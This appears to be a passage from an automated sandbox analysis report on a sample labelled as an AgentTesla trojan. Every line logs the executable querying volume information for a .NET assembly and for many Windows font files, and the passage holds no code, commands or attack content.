                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
